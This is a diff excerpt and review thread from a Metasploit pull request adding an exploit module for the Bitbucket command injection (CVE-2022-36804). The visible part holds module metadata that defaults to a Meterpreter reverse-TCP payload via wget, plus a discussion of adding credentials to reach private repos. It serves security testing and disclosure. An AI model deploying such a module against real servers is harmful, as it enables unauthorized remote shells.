modules/exploits/linux/http/bitbucket_git_cmd_injection.rb

```diff
@@ -0,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Bitbucket Git Command Injection',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'TheGrandPew', # discovery
+          'Ron Bowes', # analysis and PoC
+          'Jang', # testanull - PoC
+          'Shelby Pace' # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],
+          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],
+          [ 'CVE', '2022-36804' ]
+        ],
+        'Platform' => [ 'linux' ],
+        'Privileged' => false,
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [
+            'Automatic Target',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' => 'wget',
+              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DisclosureDate' => '2022-08-24',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7990),
+        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/'])
```

Comment:
Is it sensible to have an (optional) username/password so we can hit a private repo? Probably public repos are enough, but in theory we *could* support private repos

Reply:
Yea, that would be good to add

Reply:
Also added in [34a6671](https://github.com/rapid7/metasploit-framework/pull/17042/commits/34a6671c2d4e9e20457281aea59c65bffb05eecf)